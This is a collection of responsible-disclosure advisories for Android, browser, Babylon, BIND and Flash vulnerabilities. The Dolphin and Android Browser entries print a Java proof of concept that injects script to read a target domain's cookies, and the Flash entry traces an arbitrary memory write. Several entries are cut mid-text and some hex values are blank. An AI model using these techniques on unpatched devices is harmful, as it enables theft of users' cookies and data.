Google Nexus 5X Bootloader Unauthorized Memory Dumping via USB
Vulnerable versions: Android 6.0.0 MDA89E through 6.0.1 MMB29V (bootloaders bhz10i/k) Non-vulnerable versions: Android 6.0.1 MHC19J (bootloader bhz10m) and above. Details: == The attacker reboots the phone into the 'fastboot' mode. A physical attacker can do this, without authorization, by pressing both the 'power' and 'volume down' buttons during device boot. An attacker with an authorized ADB access can do this by issuing the 'adb reboot bootloader' command. The fastboot mode exposes a USB interface, which, on locked devices, must not allow any security-sensitive operation to be commanded. However, we discovered that if the attacker issued the 'fastboot oem panic' command via the fastboot USB interface, the bootloader would be forced to crash: [38870] fastboot: oem panic [38870] panic (frame 0xf9b1768): [38870] r0 0x0f9972c4 r1 0x4e225c22 r2 0x7541206f r3 0x74206874 [38870] r4 0x0f9972e8 r5 0x0f96715c r6 0x0f9972f0 r7 0x0f9670ec [38870] r8 0x0f92e070 r9 0x r10 0x r11 0x [38870] r12 0x0f92e070 usp 0x0f9650ec ulr 0x pc 0x0f99c75c [38870] spsr 0x0f936964 [38870] fiq r13 0x0f989490 r14 0x [38870] irq r13 0x0f989490 r14 0x0f9004f4 [38870] svc r13 0x0f9b16f0 r14 0x0f92dd0c [38870] und r13 0x0f989490 r14 0x [38870] sys r13 0x r14 0x [38880] panic (caller 0xf936964): generate test-panic The problem is that in the vulnerable versions of the bootloader, such a crash would cause the bootloader to expose a serial-over-USB connection, which would allow an attacker to obtain a full memory dump of the device using tools such as QPST Configuration. The resulting memory dump files would then be available under the attacker’s PC. More details are available at https://securityintelligence.com/undocumented-patched-vulnerability-in-nexus-5X-allowed-for-memory-dumping-via-usb/
Vulnerability in the Dropbox SDK for Android (CVE-2014-8889)
Hi, We have recently discovered a vulnerability in the Dropbox SDK for Android. This vulnerability may enable theft of sensitive information from apps that use the vulnerable Dropbox SDK both locally by malware and also remotely by using drive-by exploitation techniques. The vulnerability is identified as CVE-2014-8889. We had privately reported the issue to the Dropbox team which soon provided a fix with version 1.6.2 of the SDK. More details are available at: 1. Blog post: http://ibm.co/1Hosb02 2. Whitepaper: http://bit.ly/1BqEwjo 3. Video demo: http://bit.ly/1GklNFO
Android KeyStore Stack Buffer Overflow (CVE-2014-3100)
Hi, We have discovered a stack-based buffer overflow in the Android KeyStore service which affects Android 4.3 and below. The issue was patched in Android 4.4. The vulnerability is identified as CVE-2014-3100. More details are available at: 1. Blog post: http://ibm.co/1pbk4yH 2. Advisory: http://slidesha.re/1nxBnmY -Roee
Firefox for Android Profile Directory Derandomization and Data Exfiltration (CVE-2014-1484, CVE-2014-1506, CVE-2014-1515, CVE-2014-1516)
Hi, We have recently discovered a series of vulnerabilities in Firefox for Android that allows a malicious application to successfully derandomize the Firefox profile directory name in a practical amount of time and then leak sensitive data (such as cookies and cached information) which reside in that directory, breaking Android's sandbox: 1. (CVE-2014-1516) Profile Directory Name Weak Randomization. 2. (CVE-2014-1484) Profile Directory Name Leaks to Android System Log. 3. (CVE-2014-1515) Automatic File Download to SD Card. 4. (CVE-2014-1506) Crash Reporter File Manipulation. The full analysis with exploitation techniques can be found in our whitepaper. Important links: 1. Blog post: http://bit.ly/1drYsZp 2. Whitepaper: http://slidesha.re/1gqiyD3 -Roee
Android Fragment Injection vulnerability
Hi, We have recently disclosed a new vulnerability to the Android Security Team. The vulnerability affected many apps, including Settings (the one that is found on every Android device), Gmail, Google Now, Dropbox and Evernote. To be more accurate, any App which extended the PreferenceActivity class using an exported activity was automatically vulnerable. A patch has been provided in Android KitKat. If you wondered why your code is now broken, it is due to the Android KitKat patch which requires applications to override the new method, PreferenceActivity.isValidFragment, which has been added to the Android Framework. Important links: 1. Blog post: http://ibm.co/1bAA8kF 2. Whitepaper: http://ibm.co/IDm2Es Roee Hay IBM Application Security Team Lead
Subverting BIND's SRTT Algorithm: Derandomizing NS Selection
Hi, BIND is exposed to a new vulnerability which can be exploited remotely in order to derandomize the name server selection algorithm. Exploitation of this vulnerability can be used in conjunction with other off-path DNS cache poisoning exploits in order to make them more efficient. ISC has acknowledged the vulnerability and plans to address this deficiency by re-implementing the SRTT algorithm in future maintenance releases of the BIND 9 code. Important links: 1. Whitepaper: http://bit.ly/17LBSC1 2. Slides: http://bit.ly/17M3gj9 3. Blog post: http://ibm.co/17ntOIw 4. ISC's Operational Notification: http://bit.ly/1d3iR3z -Roee
Advisory: Android SQLite Journal Information Disclosure (CVE-2011-3901)
1 Background Android applications are executed in a sandbox environment, to ensure that no application can access sensitive information held by another, without adequate privileges. For example, The Browser application holds sensitive information such as cookies, cache and history, and this cannot be accessed by third-party apps, while the Google Talk application stores contacts and conversations. An android app may request specific privileges during its installation; if granted by the user, the app's capabilities are extended. One mechanism which Android uses in order to implement the sandbox, is running each application as a separate process, and as a Linux user which is private to the application's package. Running applications as different users makes files owned by one application inaccessible to another (unless explicitly allowed). At the application deployment phase, Android allocates the application a data directory, identified by the application's package, under the /data/data path. Android provides support for SQLite databases. Applications can create a private database identified by name. Once created, the database is stored under the /data/data/app package/databases directory, with the chosen name as a filename. The SQLite database engine maintains a rollback journal. When an application changes the database, the original unchanged database is first copied to the journal, and in case of a crash or a ROLLBACK action, the database can be recovered. The journal has the same filename as the database itself, but with a -journal suffix. 2 Vulnerability === The journal file of SQLite databases can be read by all applications: * The application's data directory has execution rights for all users, up to the root. This means that files with read or write permissions for all users, found under the application's data directory are actually globally accessible. * The /data/data/app package/databases directory is created with [rwxrwx--x] permissions, meaning that files under that dir with global read or write permissions, are globally readable or writable. * The journal file is created under the databases directory with [-rw-r--r--] permissions and therefore it can be read by all apps. Conclusion: All databases maintained by Android's SQLite engine (unless named with a random and unguessable string) can be leaked by malicious applications without the need to declare adequate privileges. The databases can be leaked during the lifetime of the journal file, (i.e. when the transaction is made). 3 Impact A malicious app can eavesdrop on database activities performed by any other application using SQLite, allowing unauthorized access to information such as URL history, messages, and contacts. 4 Vulnerable versions = Android 2.3.7. 5 Non-vulnerable versions = Android 4.0.1. 6 Credit Discovered by Roee Hay ro...@il.ibm.com 7 Acknowledgments = We would like to thank the Android Security Team for the efficient way in which they handled this security issue. 8 References * Full advisory with PoC. http://bit.ly/K0W0pT * Blog post. http://bit.ly/JEThEf * Video demonstration. http://youtu.be/oCXLHjmH5rY
Advisory: Opera Mobile Cache Poisoning XAS
[] buffer = new byte[1024]; int len = -1; while (-1 != (len = input.read(buffer))) output.write(buffer, 0, len); output.close(); input.close(); } catch (IOException e) {} File f = new File(dstPath); f.setReadable(true, false); f.setWritable(true, false); } } 6 Vulnerable versions = Opera Mobile 11.1 has been found vulnerable. 7 Vendor response = Opera Mobile 11.1 update 2 has been released, which incorporates a fix for this bug. 8 Credit Roee Hay ro...@il.ibm.com 9 Acknowledgements == We would like to thank the Opera team for the efficient and quick way in which it handled this security issue. 10 References = • Original advisory: http://blog.watchfire.com/files/advisory-opera-cp-xas.pdf • Blog post: http://blog.watchfire.com/wfblog/2011/09/opera-mobile-cache-poisoning-xas.html • Video of the PoC: http://youtu.be/8fWZh5jwFfE • Android 11.1 update 2 ready for download: http://bit.ly/android-11-1-update-2
Advisory: Dolphin Browser HD Cross-Application Scripting
1 Background Android applications are executed in a sandbox environment, to ensure that no application can access sensitive information held by another, without adequate privileges. For example, the Dolphin browser application holds sensitive information such as cookies, cache and history, and this cannot be accessed by third-party apps. An android app may request specific privileges during its installation; if granted by the user, the app's capabilities are extended. Intents are used by Android apps for intercommunication. These objects can be broadcast, passed to the startActivity call (when an application starts another activity), or passed to the startService call (when an application starts a service). Normally, when startActivity is called, the target activity's onCreate method is executed. However, under AndroidManifest.xml it is possible to define different launch tags, which affect this behavior. One example is the singleTask launch tag, which makes the activity act as a singleton. This affects the startActivity call: if the activity has already been started when the call is made, the activity's onNewIntent member function is called instead of its onCreate method. 2 Vulnerability === A 3rd party application may exploit Dolphin Browser HD's URL loading process in order to inject JavaScript code into an arbitrary domain thus break Android's sandboxing. This can be done by sending two consecutive startActivity calls. The first call includes the attacked domain, and causes Dolphin Browser HD to load it, while the second call contains JavaScript code. the JavaScript URI will be opened under the current tab, i.e. the attacked domain. 3 Impact By exploiting this vulnerability a malicious, non-privileged application may inject JavaScript code into the context of any domain; therefore, this vulnerability has the same implications as global XSS, albeit from an installed application rather than another website. Additionally, an application may install itself as a service, in order to inject JavaScript code from time to time into the currently opened tab, thus completely intercepting the user's browsing experience. 4 Proof-of-Concept == The following is a PoC for the second technique: public class CasExploit extends Activity { static final String mPackage = mobi.mgeek.TunnyBrowser; static final String mClass = BrowserActivity; static final String mUrl = http://target.domain/;; static final String mJavascript = alert(document.cookie); static final int mSleep = 15000; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); startBrowserActivity(mUrl); try { Thread.sleep(mSleep); } catch (InterruptedException e) {} startBrowserActivity(javascript: + mJavascript); } private void startBrowserActivity(String url) { Intent res = new Intent(android.intent.action.VIEW); res.setComponent(new ComponentName(mPackage,mPackage+.+mClass)); res.setData(Uri.parse(url)); startActivity(res); } } 5 Vulnerable versions = Dolphin Browser HD 6.0.0 has been found vulnerable. 6 Vendor Response = Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates a fix for this bug. 8 Credit * Roee Hay ro...@il.ibm.com * Yair Amit yai...@gmail.com 9 References * Original advisory: http://blog.watchfire.com/files/advisory-dolphin.pdf * Blog post: http://blog.watchfire.com/wfblog/2011/09/dolphin-browser-hd-cross-application-scripting.html * Demo of the PoC: http://youtu.be/1E0GzZPdpLM * Android Browser Cross-Application Scripting (CVE-2011-2357): http://blog.watchfire.com/files/advisory-android-browser.pdf 10 Acknowledgments == We would like to thank the Dolphin Browser team for the efficient and quick way in which it handled this security issue.
Android Browser Cross-Application Scripting (CVE-2011-2357)
the current tab, i.e. the attacked domain. 4) Impact -- By exploiting this vulnerability a malicious, non-privileged application may inject JavaScript code into the context of any domain; therefore, this vulnerability has the same implications as global XSS, albeit from an installed application rather than another website. Additionally, an application may install itself as a service, in order to inject JavaScript code from time to time into the currently opened tab, thus completely intercepting the user's browsing experience. 5) Proof-of-Concept The following is a PoC for the second technique: public class CasExploit extends Activity { static final String mPackage = com.android.browser; static final String mClass = BrowserActivity; static final String mUrl = http://target.domain/;; static final String mJavascript = alert(document.cookie); static final int mSleep = 15000; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.main); startBrowserActivity(mUrl); try { Thread.sleep(mSleep); } catch (InterruptedException e) {} startBrowserActivity(javascript: + mJavascript); } private void startBrowserActivity(String url) { Intent res = new Intent(android.intent.action.VIEW); res.setComponent(new ComponentName(mPackage,mPackage+.+mClass)); res.setData(Uri.parse(url)); startActivity(res); } } 6) Vulnerable versions --- Android 2.3.4 and Android 3.1 have been found vulnerable. 7) Vendor Response --- Android 2.3.5 and 3.2 have been released, which incorporate a fix for this bug. The fixes can be found in the following commits: * http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=afa4ab1e4c1d645e34bd408ce04cadfd2e5dae1e * http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=096bae248453abe83cbb2e5a2c744bd62cdb620b Patches are available for Android 2.2.* and will be released at a later date. Organizations can contact secur...@android.com for patch information. Android has communicated information about this vulnerability to their partners, and all new Android compatible devices are required to incorporate this bug fix: * http://source.android.com/compatibility/overview.html * http://source.android.com/faqs.html#compatibility * http://android.git.kernel.org/?p=platform/cts.git;a=commit;h=7e48fb87d48d27e65942b53b7918288c8d740e17 Android Market actively scans all Android Market applications to detect and prevent exploitation of security vulnerabilities. 8) Additional information -- * Original advisory: http://blog.watchfire.com/files/advisory-android-browser.pdf * Demo of PoC: http://www.youtube.com/watch?v=BzUpbcrWufs 9) Credit -- * Roee Hay ro...@il.ibm.com of IBM Rational Application Security Research Group * Yair Amit yai...@gmail.com 10) Acknowledgments We would like to thank the Android Security Team for the efficient and quick way in which they handled this security issue.
Babylon Cross-Application Scripting Code Execution
Introduction Babylon is a single-click computer online dictionary and translation software which is also capable of translating whole documents and web pages. The translation and dictionary results are presented to the user via the Trident layout engine (an in-app/embedded Internet-Explorer rendering engine). Vulnerability = Babylon fails to sanitize user input before rendering it on the Trident control, effectively leading to a Cross-Application Scripting vulnerability. The user's input can originate from the following sources: 1. Babylon's main translation interface: When searching for a non-existent term Babylon pushes the string No matches were found for 'non-existent term'. Search the web for non-existent-term. Unfortunately, 'non-existent term' is not HTML encoded or validated before it is written on the embedded browser (the translation process transparently validates translatable input). 2. Document translation: Documents (such as PDF files) may contain text which cannot be translated (e,g. JavaScript code), in such case it is rendered without HTML encoding or validation. 3. Web site translation: Same as the document translation case. Text which is not translated is simply rendered on the Trident control. In order to trigger an attack, the victim has to be lured into translating malicious text, either in a document or on a web page. Although the scenarios require some social-engineering, some of them are feasible and realistic. Impact == The Trident control runs in Local Machine Zone (LMZ) which is not Locked down. This allows a malicious script to perform the following actions: 1. Interact with other websites in the background while using persistent cookies to impersonate the victim: This can be done using XHR. The payload can leak the response's body which may contain sensitive information in case the victim has been authenticated on the site prior to the attack. The payload can also perform actions on the site on behalf of the victim. 2. Collect information from local files: This can be done using XHR or by a hidden iframe with the filename's as the source. Since the payload runs in a non-Locked-down LMZ, the XHR response or iframe's body can be inspected and sent back to the attacker. 3. Code execution: System commands can be executed by using the Wscript.Shell ActiveX object to practically take over the whole system. Vulnerable versions === Versions prior to 8.0.7 are susceptible to this vulnerability. Credit == Yair Amit amity...@il.ibm.com Roee Hay ro...@il.ibm.com Acknowledgments === We would like to thank the Babylon team for their quick responses and the efficient way in which they handled this security issue. References == 1. Original advisory: http://blog.watchfire.com/files/babylon_cas_advisory.pdf 2. Blog post: http://blog.watchfire.com/wfblog/2010/11/babylon-cross-application-scripting.html 3. Demo: http://www.youtube.com/watch?v=51ypgI1lqzE 4. Babylon's homepage: http://www.babylon.com/ 5. Enhanced Browsing Security: http://technet.microsoft.com/en-us/library/bb457150.aspx
Advisory: Adobe Flash Player and AIR AVM2 intf_count Integer Overflow Remote Code Execution (CVE-2009-1869)
Background: == ActionScript code is compiled into ActionScript Byte Code segments, loaded by AVM2 (ActionScript Virtual Machine 2). These segments are described by the abcFile structure: abcFile { u16 minor_version u16 major_version cpool_info constant_pool u30 method_count method_info method[method_count] u30 metadata_count metadata_info metadata[metadata_count] u30 class_count instance_info instance[class_count] class_info class[class_count] u30 script_count script_info script[script_count] u30 method_body_count method_body_info method_body[method_body_count] } The value of class_count element is the number of entries in the instance and class arrays. Each instance entry is a variable length instance_info structure which specifies the characteristics of object instances created by a particular class: instance_info { u30 name u30 super_name u8 flags u30 protectedNs u30 intrf_count u30 interface[intrf_count] u30 iinit u30 trait_count traits_info trait[trait_count] } The value of the intrf_count field is the number of entries in the interface array. The interface array contains indices into the multiname array of the constant pool; the referenced names specify the interfaces implemented by this class. Vulnerability: = An integer overflow exists in the AVM2 abcFile parser code which handles the intrf_count value of the instance_info structure. When intrf_count is larger than 0x1000, it is nullified due to an integer overflow. This results in an out of bounds pointer dereference. The out of bounds object contains arbitrary values (in the context of the code which handles the interfaces count element) which are manipulated in a way so that an arbitrary memory overwrite with an attacker supplied destination and value is possible. The following is a detailed run trace which explains the vulnerability. Irrelevant instructions are omitted. Flash10b.ocx is assumed to be loaded at VA 1000h. let intrf_count be 0x1000 .text:10206B03 mov edi, [esp+50h+var_2C] ; EDI=intrf_count=0x1000 .text:10206B14 lea edx, [edi+edi]; EDX=intrf_count*2=0x2000, may not overflow (verified elsewhere) .text:10206B1B call sub_101EAC30 .text:101EAC45 call sub_101EAB90 .text:101EAB98 call sub_101D1FF0 ; this method calculates the nearest power of 2 for intrf_count*2 (i.e: stays 0x2000) .text:101EABA0 add eax, eax ; doubles that value (i.e: EAX=0x4000) .text:101EABCC lea ecx, ds:0[eax*4] ; multiplies it by 4 (i.e: ECX=0x) =OVERFLOW= .text:101EABDA call sub_10224C62 .text:10224C62 jmp sub_10224363 .text:10224363 mov edx, [esp+arg_0] ; arg_0 is the overflown value (i.e: EDX=) .text:10224367 lea eax, [edx+7] .text:10224376 and eax, 0FFF8h; EAX= .text:1022437A mov esi, eax ; ESI= .text:102243A4 mov ecx, esi ; ECX= .text:102243A9 mov eax, [eax+ecx*4-4] ; the overflown value is used as an index into pointer table, starting at EAX. ; since we can cause ECX to become 0x000, we may select an out of bounds ; pointer (eax-4). Tests show that it always contains a valid pointer to some ; object, with arbitrary values. i.e: EAX=OutOfBoundsObject .text:102243AD mov ecx, eax ; ECX=OutOfBoundsObject .text:102243C8 callsub_10226D4D .text:10226D53 mov ebx, ecx ; EBX=OutOfBoundsObject .text:10226D6C mov esi, [ebx+8] ; ESI=ArbitraryObjectA (usually: 0x) .text:10226D76 testbyte ptr [esi+2Ah], 1 ; PathConditionA - must pass this in order to continue .text:10226D7A jz short loc_10226DA5 .text:10226D7C mov eax, [ebx+38h] ; EAX=ArbitraryObjectB, (usually 0x5557) .text:10226D7F cmp byte ptr [eax+33Ch], 0 ; PathConditionB - must pass this in order to continue .text:10226D86 mov ecx, ebx ; ECX=OutOfBoundsObject .text:10226D88 jnz short loc_10226D9D .text:10226D8A pushesi .text:10226D8B callsub_10226CAF .text:10226CB0 mov esi, [esp+4+arg_0] ; ESI=ArbitraryObjectA, (usually 0x) .text:10226CB5 pushesi .text:10226CB6 mov edi, ecx ; EDI=OutOfBoundsObject .text:10226CB8 callsub_102266CA .text:102266CA mov eax, [esp+arg_0] ; EAX=ESI=ArbitraryObjectA (usually 0x) .text:102266DB mov ecx, [eax+1Ch] ; ECX=arbitrary value - usually *(0x5571) .text:102266CE mov edx, [eax+20h] ; EDX=arbitrary value - usually *(0x5575) .text:102266DE mov [ecx+20h], edx;; JACKPOT - a write of an arbitrary DWORD to an arbitrary VA The following is an